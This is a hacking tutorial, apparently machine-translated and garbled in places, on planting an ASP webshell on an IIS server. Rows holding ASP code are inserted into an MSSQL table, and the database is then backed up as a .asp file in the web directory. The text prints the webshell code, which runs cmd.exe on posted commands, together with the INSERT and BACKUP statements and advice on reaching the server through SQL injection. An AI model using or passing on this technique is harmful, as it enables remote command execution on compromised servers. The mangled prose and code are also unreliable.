Create WebShell with MSSQL Backup

I was earlier to use the database system to write the following things under MySQL. I remember that there is a classic post to use TCP rebound combined with input method, the first step, it is also a very important step to use the mysql export table. I got a Web on a web. The Access feature is not so powerful. When there is an injection vulnerability, it is not possible to get the permissions of any commands directly. If MSSQL has a lot of people studying, the implementation of the order is a lot, but there is no permission of Exec, What is done is still limited. Many people are asking, MSSQL can not export a table to the file, just like mysql, at least a low permissions will come to see, I found it to find the command to find the export table, I have another I can't export the table, then you have to export the database, the effect, most of the situation is still the same.

Let's take a look at why you can explain before explaining the practice. When IS is processed by the ASP.DLL, the IS is directly output to the content other than <%%>, such as copying one .exe file to the web publishing directory, change the extension name .asp In IE, the result of returning is mostly the contents of the .exe file, not a 500 server internal error. For the content enclosed in <%%>, by default, the execution will be explained in accordance with VBScripts. If there is a syntax error in <%%>, there will be a common 500 server internal error. In other words, if there is a file that is .asp is the extension file, as long as we can carefully control all the contents of all <%%>, we will make it correctly, and as for something outside <%%>, ASP .dll does not deal with it, we don't care.

Let's take a look at the situation of using Backup Database under MSSQL. Just export a database to see, such as Model, of course, you can do it in the query analyzer:

Backup Database Model to Disk = 'c: /a.txt'

Open this file in a text. Through the above analysis, we only need to know the default, if this file is changed to the .asp, there will be no problem, so we look for whether there is <% and%>, huh, obviously no It means that our request will return the content of the text. The first is that the default export file does not cause an explanation to execute an error, this is a key step, and the rest is that we have to make him a shell, of course, is a table, the content is backup It will be stored in the backup file, we can control the contents of the table, naturally also control the contents of the backup file. It may have been here to write a brain to write the content of the classic ASP shell to the new table. Then Backup Database, Well, it is not so simple. If you do this, if you want to continue our experiment, then you may spend it. The cost of reloading MSSQL. For data such as text, nvchar, etc., like Text, NVChar, etc., in the database, "ABC", but in the export file, it has become a wide character, which has become "a b c", such a Even if you write a "<%", it is the same "<%" in the backup file, the content inside is even more messy, and it will not be interpreted. To avoid this, the list of tables we created should be a binary form, such as an attribute is image, such a sub, adding content, what is the original backup file, the rules, Can't change at all. In order to here, only one problem is left, even if you write the contents of the ASP Shell to the new binary table, it will not be a separate line, who knows between the two lines of the same table, in the derived backup file There will be some other content, if this is the case, the previous line is "the content is ok, if there is some messy data, use VBScripts to explain 100% one hundred% 500 errors. So each line must be a complete <%%>, so we can fully control the content of <%%> to ensure a correct ASP shell. OK, finally reached the part of practice. Through the above analysis, you should know that using Backup Database to make a shell is completely feasible, let's write the ASP shell that uses FSO to make it in line with our requirements:

<% DIM OSCRIPT%> <% DIM OSCRIPTNET%> <% DIM OfileSys, Ofile%> <% DIM SZCMD, SZTEMPFILE%> <% set oscript = server.createObject ("wscript.shell")%> <% set oscriptnet = Server.createObject ("wscript.network")%> <% set ofilesys = server.createObject ("scripting.filesystemObject")%> <% szcmd = request.form (". Cmd")%> <% IF (SZCMD < > "" "" "" <%> <% Call oscript.run ("cmd.exe / c" & szcmd) ("cmd.exe / c" & szcmd) ("cmd.exe / c" & szcmd ">" & sztempfile, 0, true )%> <% Set ofile = ofilesys.opentextfile (sztempfile, 1, false, 0)%> <% end if%>

'); Insert Into CMD (STR) VALUES ('<

% IF (IsObject (Ofile)) THEN%>); Insert INTO CMD (Str) VALUES ('<% on Error Resume Next%>); Insert INTO CMD (STR) VALUES (' <% response.write server. Htmlencode (Ofile.Readall)%>); Insert INTO CMD (STR) Values ​​('<% ofile.Close%>); Insert INTO CMD (STR) VALUES (' <% Call OfileSys.deletefile (Sztempfile, True) %> '); INSERT INTO CMD (STR) VALUES (' <% End IF%>); Insert INTO CMD (STR) VALUES ('  "); Backup Database Model to disk =' C: /L.asp '; copy c: /l.asp to your web publishing directory, use the browser to request, no 500 error, you have got a shell, but this shell is really too Many, you have to press a few Tab keys to enter the input box of the input command. The last thing to talk about may have problems. Generally, one database is selected. By default, it does not contain <% or%>, but it does not rule out this possibility, although the chance is small, I will encounter Once. If you haven't moved MODEL before, the exported file is definitely required, but if you write something wrong, if you have created a table, the content is <%, but there is no% in the same line, this database is You can't use it, because maybe it's a need for business rollback. Finished. Of course, the above is just the experiment in the query analyzer. In the actual situation, if you can inject SA according to SA, it is certainly relaxed, just guess the physical path of the Web, it may have some troubles, because you have one Export to the web publishing directory, maybe you can use the vulnerability of other exposure to physical paths. If it is not a SA identity, maybe Declare @a sysname; select @ a = db_name () will have some use. The chance of success, I don't dare to say too high, it is estimated that 80% is still, if you really get the shell through this method, in fact, you will find that this is the world's most cute and best ASP shell - Although there are many spam, perhaps a 2,3m big guy.